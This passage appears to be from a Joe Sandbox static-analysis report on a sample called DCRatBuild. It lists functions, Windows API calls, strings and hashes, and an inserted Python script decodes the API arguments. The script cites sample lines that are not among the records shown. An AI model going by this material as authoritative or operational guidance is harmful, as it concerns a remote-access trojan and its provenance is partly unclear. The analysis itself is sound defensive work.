                      • String ID:
                      • API String ID: 2652629310-0
                      • Opcode ID: 22bf0e72a197a24a927da453e15e6131a8c587d06ff08715faf5cf10e7001aeb
                      • Instruction ID: 537b78b37c3a9d15e4924ff2f4e9c273f845a2487c8fd294aa880641152d67f7
                      • Opcode Fuzzy Hash: 22bf0e72a197a24a927da453e15e6131a8c587d06ff08715faf5cf10e7001aeb
                      • Instruction Fuzzy Hash: E931CD72A2020AEBDB25AF65DC89DAE7BA5EB44710F084129FC04D7251EB35CD51CBB0
                      APIs
                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00D8251A
                        • Part of subcall function 00D82B52: ___AdjustPointer.LIBCMT ref: 00D82B9C
                      • _UnwindNestedFrames.LIBCMT ref: 00D82531
                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00D82543
                      • CallCatchBlock.LIBVCRUNTIME ref: 00D82567
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                      • String ID:
                      • API String ID: 2633735394-0
                      • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                      • Instruction ID: 088ea336e681ba1c2279f7a3bb37e01b2e6b9c496e1a32cf631283856ed16acb
                      • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                      • Instruction Fuzzy Hash: 49011332000108BBCF12AF65CD41EEE3BBAEF58710F058455F91866120D376E961EBB1
                      APIs
                      • GetDC.USER32(00000000), ref: 00D79DBE
                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D79DCD
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D79DDB
                      • ReleaseDC.USER32(00000000,00000000), ref: 00D79DE9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CapsDevice$Release
                      • String ID:
                      • API String ID: 1035833867-0
                      • Opcode ID: 758b37ed5a42f6829ba7007cef1cd63096d78c139136fc7893f2d46b3b526397
                      • Instruction ID: 906613124b255d65a0b3dcdbacfa2afb192b9d9a792c3175416ac1f34aec1a16
                      • Opcode Fuzzy Hash: 758b37ed5a42f6829ba7007cef1cd63096d78c139136fc7893f2d46b3b526397
                      • Instruction Fuzzy Hash: 28E0EC31985723A7D3201BA4AC0DFAB7B55AB0E712F050016FA06D6390EAB44405EBB5
                      APIs
                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00D82016
                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00D8201B
                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00D82020
                        • Part of subcall function 00D8310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00D8311F
                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00D82035
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                      • String ID:
                      • API String ID: 1761009282-0
                      • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                      • Instruction ID: 10be3bb8d72352ea7f73e1b7f4dab5134ceaee52e25cf0635e7e27711cc42216
                      • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                      • Instruction Fuzzy Hash: 5FC04834004744E41C223AF6221A6BE0B18CC62FCABA620C2ECC817107DE064B0BA337
                      APIs
                        • Part of subcall function 00D79DF1: GetDC.USER32(00000000), ref: 00D79DF5
                        • Part of subcall function 00D79DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D79E00
                        • Part of subcall function 00D79DF1: ReleaseDC.USER32(00000000,00000000), ref: 00D79E0B
                      • GetObjectW.GDI32(?,00000018,?), ref: 00D79F8D
                        • Part of subcall function 00D7A1E5: GetDC.USER32(00000000), ref: 00D7A1EE
                        • Part of subcall function 00D7A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00D7A21D
                        • Part of subcall function 00D7A1E5: ReleaseDC.USER32(00000000,?), ref: 00D7A2B5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ObjectRelease$CapsDevice
                      • String ID: (
                      • API String ID: 1061551593-3887548279
                      • Opcode ID: f61a0b5a1ea2de2ab9f7a9978f8638172219271a674ff4d6d99c6b22684a6bc3
                      • Instruction ID: 5446928c14c96c69127f3b6c736c4e2bc6b4a3a7a6b8e9c692a7900d91fc6298
                      • Opcode Fuzzy Hash: f61a0b5a1ea2de2ab9f7a9978f8638172219271a674ff4d6d99c6b22684a6bc3
                      • Instruction Fuzzy Hash: CD810171608315AFD714DF68D844A2ABBE9FFC8714F00891EF98AD7260DB31AD05DB62
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _swprintf
                      • String ID: %ls$%s: %s
                      • API String ID: 589789837-2259941744
                      • Opcode ID: 46ac4c6538d805899dd7c0d68e6bd2b701b7adbd5f5c2fb5644d9e660cdd8606
                      • Instruction ID: 6e2075809308b1c545f46fd1641aeb19cab512bb7a854e6678df183597917a60
                      • Opcode Fuzzy Hash: 46ac4c6538d805899dd7c0d68e6bd2b701b7adbd5f5c2fb5644d9e660cdd8606
                      • Instruction Fuzzy Hash: E351B57568C700FEEB211AA8DD02F367E56EB04B00F24CA06F7DE648D5F692D5906A72
                      APIs
                      • _free.LIBCMT ref: 00D8AA84
                        • Part of subcall function 00D88849: IsProcessorFeaturePresent.KERNEL32(00000017,00D88838,00000050,00D93958,?,00D6CFE0,00000004,00DA0EE8,?,?,00D88845,00000000,00000000,00000000,00000000,00000000), ref: 00D8884B
                        • Part of subcall function 00D88849: GetCurrentProcess.KERNEL32(C0000417,00D93958,00000050,00DA0EE8), ref: 00D8886D
                        • Part of subcall function 00D88849: TerminateProcess.KERNEL32(00000000), ref: 00D88874
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                      • String ID: *?$.
                      • API String ID: 2667617558-3972193922
                      • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                      • Instruction ID: 6cb59c88c5cf32cb922a38156c96d276faf25e8c2f1f4f10cab932f2977db109
                      • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                      • Instruction Fuzzy Hash: 4D519371E0011AAFEF14EFACC981AADB7F5EF58310F29816AE554E7340E6319E01CB61
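The function records above print every API reference with its raw hex arguments, and the lines carry more values than the API actually takes. As an added example that is not part of the Joe Sandbox report, the Python script below parses lines in exactly that format and decodes the documented parameter positions for the APIs seen in this section, using the constant values from the Windows SDK headers: the GetDeviceCaps indices 0x58 and 0x5A are LOGPIXELSX and LOGPIXELSY (a DPI query, not a screen-resolution check); CreateFileW with GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING and FILE_FLAG_BACKUP_SEMANTICS is the way a directory handle is obtained so that the following SetFileTime can stamp it; and IsProcessorFeaturePresent(0x17) is PF_FASTFAIL_AVAILABLE, the check the CRT makes before it falls back to TerminateProcess (0xC0000417, visible on the stack in that record, is STATUS_INVALID_CRUNTIME_PARAMETER, the exit code the CRT's invalid-parameter handler uses). The sample lines are copied from the records in this section; the constant tables, the set of APIs decoded and the helper names are the example's own.

```python
import re

# Joe Sandbox's IDA plugin prints one API reference per line as
#   Name.MODULE(arg,arg,...), ref: ADDR
# Values are hex; "?" marks a value the static pass could not resolve. The
# lines show more values than the API takes, so only the documented parameter
# positions are decoded below.
API_RE = re.compile(
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9_]+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]{8})"
)

# Constant values from the Windows SDK headers (wingdi.h, winnt.h, fileapi.h).
GETDEVICECAPS_INDEX = {0x08: "HORZRES", 0x0A: "VERTRES", 0x0C: "BITSPIXEL",
                       0x58: "LOGPIXELSX", 0x5A: "LOGPIXELSY"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH",
              0x00000080: "FILE_ATTRIBUTE_NORMAL"}
PROCESSOR_FEATURE = {0x17: "PF_FASTFAIL_AVAILABLE"}


def parse_api_line(line):
    """Return {'name','module','args','ref'} for an API line, or None when the
    line carries no call with arguments (e.g. '_swprintf.LIBCMT ref: ...')."""
    m = API_RE.search(line)
    if not m:
        return None
    raw = m.group("args").strip()
    args = [] if not raw else [None if t.strip() == "?" else int(t, 16) for t in raw.split(",")]
    return {"name": m.group("name"), "module": m.group("module"), "args": args, "ref": m.group("ref")}


def flag_names(value, table):
    """Expand a bitmask into '|'-joined names; bits not in the table stay as hex."""
    if value is None:
        return "?"
    names = [n for bit, n in table.items() if (value & bit) == bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"


def decode(call):
    """Decode the documented parameters of the APIs that appear in this section."""
    name, a = call["name"], call["args"]
    if name == "GetDeviceCaps" and len(a) >= 2:
        return {"nIndex": GETDEVICECAPS_INDEX.get(a[1], a[1])}
    if name == "CreateFileW" and len(a) >= 7:
        return {"dwDesiredAccess": flag_names(a[1], ACCESS),
                "dwShareMode": flag_names(a[2], SHARE),
                "dwCreationDisposition": DISPOSITION.get(a[4], a[4]),
                "dwFlagsAndAttributes": flag_names(a[5], FILE_FLAGS)}
    if name == "CreateEventW" and len(a) >= 4:
        return {"bManualReset": bool(a[1]), "bInitialState": bool(a[2])}
    if name == "CreateSemaphoreW" and len(a) >= 4:
        return {"lInitialCount": a[1], "lMaximumCount": a[2]}
    if name == "IsProcessorFeaturePresent" and a:
        return {"ProcessorFeature": PROCESSOR_FEATURE.get(a[0], a[0])}
    if name == "GetDlgItemTextW" and len(a) >= 4:
        return {"nIDDlgItem": a[1], "cchMax": a[3]}
    return {}


def decode_lines(lines):
    """Map each call's ref address to (API name, decoded parameters)."""
    out = {}
    for line in lines:
        call = parse_api_line(line)
        if call:
            out[call["ref"]] = (call["name"], decode(call))
    return out


# Copied verbatim from the function records in this section of the report.
SAMPLE_LINES = [
    "• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00D680B7,?,?,?), ref: 00D6A351",
    "• GetDeviceCaps.GDI32(00000000,00000058), ref: 00D79DCD",
    "• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D79DDB",
    "• CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D706FD",
    "• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D7070D",
    "  • Part of subcall function 00D88849: IsProcessorFeaturePresent.KERNEL32(00000017,00D88838,00000050,00D93958,?,00D6CFE0,00000004,00DA0EE8,?,?,00D88845,00000000,00000000,00000000,00000000,00000000), ref: 00D8884B",
    "• GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D7A9F6",
    "• _swprintf.LIBCMT ref: 00D6B51E",
]

if __name__ == "__main__":
    for ref, (name, params) in decode_lines(SAMPLE_LINES).items():
        print(f"{ref} {name}: {params}")
```

Feed it the APIs lines of any record and compare the decoded names with what the surrounding code should need: a file-extraction routine that opens directories with backup semantics and a DPI query from a dialog procedure are ordinary, whereas the same constants in a function that also touches the strings listed under the sample's configuration would be worth a closer look.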
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D67730
                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D678CC
                        • Part of subcall function 00D6A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A458
                        • Part of subcall function 00D6A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A489
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: File$Attributes$H_prologTime
                      • String ID: :
                      • API String ID: 1861295151-336475711
                      • Opcode ID: 64787562eadfc653f7c7528fd715a1298141ab30c3d203c37d21fc46b11d4783
                      • Instruction ID: 4d2c29a4925669468f646026119ca418b5b5d88335c80d4baa62ded68ab5d59e
                      • Opcode Fuzzy Hash: 64787562eadfc653f7c7528fd715a1298141ab30c3d203c37d21fc46b11d4783
                      • Instruction Fuzzy Hash: E3416F71804228ABEB24EB54DD55EEEB37CEF45304F00419AB649A3092EB745F88CF71
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: the same six dump regions (00D60000, 00D93000, 00D9E000, 00DA4000, 00DC1000, 00DC2000) listed for the first function in this section
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: UNC$\\?\
                      • API String ID: 0-253988292
                      • Opcode ID: 7eb958c4a422c68642043b462608f61d36f18372c6d481a4ea5b2c3964ed32cd
                      • Instruction ID: f50f0a2418415c0d1531ff3b92acdf39411770914d7b17022cc4595fe2c65fd2
                      • Opcode Fuzzy Hash: 7eb958c4a422c68642043b462608f61d36f18372c6d481a4ea5b2c3964ed32cd
                      • Instruction Fuzzy Hash: 12418B35840359ABCF20AF21DC41EAB7BADEF857A0B144067F854E7252E771DAD4CAB0
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: Shell.Explorer$about:blank
                      • API String ID: 0-874089819
                      • Opcode ID: 73d08ea501fbeaeea30ea7a581823f133fe692c6efaabcb5259c3117638ef20d
                      • Instruction ID: d2897b3d06e79f17a61fad0c374c4b72522d2f8e8c643abddb10f09632667053
                      • Opcode Fuzzy Hash: 73d08ea501fbeaeea30ea7a581823f133fe692c6efaabcb5259c3117638ef20d
                      • Instruction Fuzzy Hash: 782165722143149FDB08DF64C8A592AB7A9FF44721B14C55EF94D8B286EB70EC01CB71
                      APIs
                        • Part of subcall function 00D6EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D6EB92
                        • Part of subcall function 00D6EB73: GetProcAddress.KERNEL32(00DA81C0,CryptUnprotectMemory), ref: 00D6EBA2
                      • GetCurrentProcessId.KERNEL32(?,?,?,00D6EBEC), ref: 00D6EC84
                      Strings
                      • CryptUnprotectMemory failed, xrefs: 00D6EC7C
                      • CryptProtectMemory failed, xrefs: 00D6EC3B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AddressProc$CurrentProcess
                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                      • API String ID: 2190909847-396321323
                      • Opcode ID: f6a909a268a75908105bb5cb10b035a7aa7c28fc1afb258bdbda52f3a6023cd4
                      • Instruction ID: 2d2ec11a583f590bb7b8e8bd3ba174106ec54a7302edeec46a3157fa5f871c92
                      • Opcode Fuzzy Hash: f6a909a268a75908105bb5cb10b035a7aa7c28fc1afb258bdbda52f3a6023cd4
                      • Instruction Fuzzy Hash: 71115B35A04324AFDB159F39DC06A6E3B54EF01720B0A811AFC05AB395DB35AE4197F4
                      APIs
                      • CreateThread.KERNEL32(00000000,00010000,00D709D0,?,00000000,00000000), ref: 00D708AD
                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00D708F4
                        • Part of subcall function 00D66E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D66EAF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Thread$CreatePriority__vswprintf_c_l
                      • String ID: CreateThread failed
                      • API String ID: 2655393344-3849766595
                      • Opcode ID: f3aa4e61c31fab1e9968396e907e7b18e4697bcc952bc4185f86a9ce56248363
                      • Instruction ID: 797edd4136f85ebf5427e698701765ea3debdf436cad5e3dacaffa5224f17653
                      • Opcode Fuzzy Hash: f3aa4e61c31fab1e9968396e907e7b18e4697bcc952bc4185f86a9ce56248363
                      • Instruction Fuzzy Hash: B00149B1344301AFD724BF54EC81F667B98EF01711F10403EFA8AA22C1DEA1B8409674
                      APIs
                        • Part of subcall function 00D6DA98: _swprintf.LIBCMT ref: 00D6DABE
                        • Part of subcall function 00D6DA98: _strlen.LIBCMT ref: 00D6DADF
                        • Part of subcall function 00D6DA98: SetDlgItemTextW.USER32(?,00D9E154,?), ref: 00D6DB3F
                        • Part of subcall function 00D6DA98: GetWindowRect.USER32(?,?), ref: 00D6DB79
                        • Part of subcall function 00D6DA98: GetClientRect.USER32(?,?), ref: 00D6DB85
                      • GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                      • SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                      • String ID: 0
                      • API String ID: 2622349952-4108050209
                      • Opcode ID: 17c71f3e430916931e64124b4dfa28e0adf55aa30f18e611559727257fc91fa8
                      • Instruction ID: 0611cceda27d24b29f67a87890d34dafdc66bd2c0b4693778003809ab7334525
                      • Opcode Fuzzy Hash: 17c71f3e430916931e64124b4dfa28e0adf55aa30f18e611559727257fc91fa8
                      • Instruction Fuzzy Hash: 9AF08C3810438DABDF250F608809BBA3B98BB25305F0C8114FD4A947B1C774C995AA74
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF,00D70A78,?), ref: 00D70854
                      • GetLastError.KERNEL32(?), ref: 00D70860
                        • Part of subcall function 00D66E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D66EAF
                      Strings
                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D70869
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                      • API String ID: 1091760877-2248577382
                      • Opcode ID: 4beeed0ac83104984b1f547c0ad96c2c221840a7c2f278483994200cf0021ecc
                      • Instruction ID: 73506b787e667e361c96a690f03c0c376e7bb1a49830050c43a23ffaf0192cbb
                      • Opcode Fuzzy Hash: 4beeed0ac83104984b1f547c0ad96c2c221840a7c2f278483994200cf0021ecc
                      • Instruction Fuzzy Hash: 5BD05E31A081306BCB103B64AC0ADAF7D099F52770F248719F23DA52F6DA22495182F6
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,00D6D32F,?), ref: 00D6DA53
                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D6D32F,?), ref: 00D6DA61
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FindHandleModuleResource
                      • String ID: RTL
                      • API String ID: 3537982541-834975271
                      • Opcode ID: b177d7e905c164584dd2b4ff94f64213ad80fa47d7965f59b955503d78ccbe90
                      • Instruction ID: 47a4fc0496451268ecca4faf62d66d27b5df5903e102900f0a7b23d71b754faf
                      • Opcode Fuzzy Hash: b177d7e905c164584dd2b4ff94f64213ad80fa47d7965f59b955503d78ccbe90
                      • Instruction Fuzzy Hash: 23C0123178935077DB301B607C0DB4329485B10B11F09044DB145DA2D0D5F6C9448670
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID: 2EP4
                      • API String ID: 0-2520254972
                      • Opcode ID: fa7fac3ea0f31764472c145a98fe529c1e848e30f4e88aaaf6f3f421987daa20
                      • Instruction ID: 8b320eae811f84561b315c951571bc6ab51f9d49b537d636e2f95fd79667c52d
                      • Opcode Fuzzy Hash: fa7fac3ea0f31764472c145a98fe529c1e848e30f4e88aaaf6f3f421987daa20
                      • Instruction Fuzzy Hash: B081A031B0CA494FEB58DE1C8CA55A97BE2FF99304B15417AE59DD3386CE78EC028781
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID: v64
                      • API String ID: 0-2040660224
                      • Opcode ID: 0e61cfa4cb5d6fcf27ff6ecc992737f4fa251a6354910f4d0faa429aca5d3ad2
                      • Instruction ID: 8730eb3cdd30433bf01394f92ff4127949d1934af30a76aa3e47fdebb442a87c
                      • Opcode Fuzzy Hash: 0e61cfa4cb5d6fcf27ff6ecc992737f4fa251a6354910f4d0faa429aca5d3ad2
                      • Instruction Fuzzy Hash: D011BF31E0950E4FEB90EF6888A91BD7BE4FF6A300F4285B6D528D6096DE7CE8459740
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2231218625.00007FFD34470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_7ffd34470000_portperf.jbxd
                      Similarity
                      • API ID:
                      • String ID: Xy64
                      • API String ID: 0-3698708046
                      • Opcode ID: b543dfa5852d478b0de6be5c2ea804c5d860a7be3157cd37d8bac8b31f5cb62e
